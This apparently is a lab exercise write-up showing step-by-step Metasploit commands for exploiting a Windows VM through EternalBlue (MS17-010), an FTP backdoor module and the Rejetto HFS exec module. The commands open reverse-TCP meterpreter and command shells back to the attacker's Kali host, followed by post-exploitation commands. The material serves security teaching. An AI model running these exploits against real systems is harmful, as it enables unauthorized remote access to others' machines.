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EXERCISE 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DEMONSTRATE VARIOUS EXPLOITS OF WINDOWS OS USING METASPLOIT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To study and demonstrate various exploits against a Windows Operating System using the Metasploit Framework in Kali Linux.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/ TOOLS REQUIRED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Kali Linux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Windows Target Machine (Windows 7 / Windows XP / Vulnerable Windows VM)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Metasploit Framework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Network connectivity between attacker and target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1: Start Metasploit Framework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terminal in Kali Linux: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msfconsole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msf6 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2: Identify Target IP Address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Find the Windows machine IP (example):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Target IP: 192.168.56.105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EXPLOIT 1 — Windows SMB Exploit (MS17-010 / EternalBlue)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Exploits a vulnerability in SMB protocol allowing remote code execution.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Search exploit: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search ms17-010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exploit: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exploit/windows/smb/ms17_010_eternalblue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Set payload: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set payload windows/x64/meterpreter/reverse_tcp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 target details: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set RHOSTS 192.168.56.105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 LHOST &lt;Your_Kali_IP&gt;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Run exploit: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exploit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Meterpreter session 1 opened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Verify access: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meterpreter &gt; sysinfo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EXPLOIT 2 — Windows FTP Backdoor Exploit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Exploits a backdoored FTP service running on vulnerable Windows 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Search exploit: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search ftp backdoor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exploit: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 exploit/windows/ftp/ftpd_235_backdoor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Set target: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 RHOSTS 192.168.56.105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exploit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Command shell session opened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EXPLOIT 3 — Windows HTTP File Server (HFS) Exploit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Exploits a vulnerable HTTP File Server on Windows.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Search exploit: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search hfs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 exploit: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 exploit/windows/http/rejetto_hfs_exec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Set parameters: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set RHOSTS 192.168.56.105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set LHOST &lt;Your_Kali_IP&gt;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exploit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Meterpreter session opened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POST-EXPLOITATION COMMANDS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getuid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sysinfo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Successfully exploited Windows OS using Metasploit.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Obtained Meterpreter and command shell access.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Verified system details and privileges.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Thus, various Windows OS exploits were successfully demonstrated using the Metasploit Framework in Kali Linux, proving the importance of patch management and system hardening.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